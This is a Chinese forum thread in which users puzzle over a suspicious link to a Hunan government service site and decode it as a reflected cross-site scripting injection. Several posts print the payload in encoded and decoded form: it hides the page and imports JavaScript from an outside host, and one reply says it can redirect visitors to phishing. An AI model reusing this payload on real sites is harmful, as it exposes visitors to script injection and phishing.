设为首页收藏本站
切换到宽版

MJJ论坛

 找回密码
 注册
MJJ论坛»论坛 主机综合交流 美国VPS综合讨论 这是漏洞被利用了么
返回列表 发新帖
查看: 1725|回复: 8

[美国VPS] 这是漏洞被利用了么

[复制链接]
magotcai
发表于 2024-4-11 11:42:57 | 显示全部楼层 |阅读模式
看不出怎么操作的。
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11%252522%25257D%25253B%252524%252528%252560*%252560%252529.hide%252528%252529%25253Bimport%252528%252527%25252F%25252Fwx4.cc%25252Fhunan%252527%252529%25253B%25257B%252522&areanamesearch=%2525u6E56%2525u5357%2525u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair
回复

举报

a692830
发表于 2024-4-11 11:47:11 | 显示全部楼层
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=湖南省&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair
回复 支持 反对

举报

magotcai
 楼主| 发表于 2024-4-11 11:48:15 | 显示全部楼层
a692830 发表于 2024-4-11 11:47
https://zwfw-new.hunan.gov.cn/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hun ...

这样看就是这网站js有漏洞呀
回复 支持 反对

举报

a692830
发表于 2024-4-11 11:49:38 | 显示全部楼层
没有多大用啊 微信 QQ均已经拦截
回复 支持 反对

举报

sakuraidc
发表于 2024-4-11 11:49:52 来自手机 | 显示全部楼层
magotcai 发表于 2024-4-11 11:48
这样看就是这网站js有漏洞呀

反馈一下,说不定有钱拿
回复 支持 反对

举报

发表于 2024-4-11 11:54:21 | 显示全部楼层
多次urldecode后可以看到URL传递的参数如下:

/onething/service/indexSearch.jsp?areacodesearch=439900000000&entid=hunan&wordsearch=11"};$(`*`).hide();import('//wx4.cc/hunan');{"&areanamesearch=%u6E56%u5357%u7701&me1sa6=c1aehm12j4f064phiyn7n9kn8ik3zair

通过wordsearch参数传入的JS代码调用了//wx4.cc/hunan这个JS


回复 支持 反对

举报

BigBug
发表于 2024-4-12 10:00:45 | 显示全部楼层
这帮逼人真牛逼
回复 支持 反对

举报

hins
发表于 2024-4-12 10:30:12 | 显示全部楼层
能跳转钓鱼
回复 支持 反对

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|MJJ论坛

Copyright MJJ论坛 © 2022 All Rights Reserved.

快速回复 返回顶部 返回列表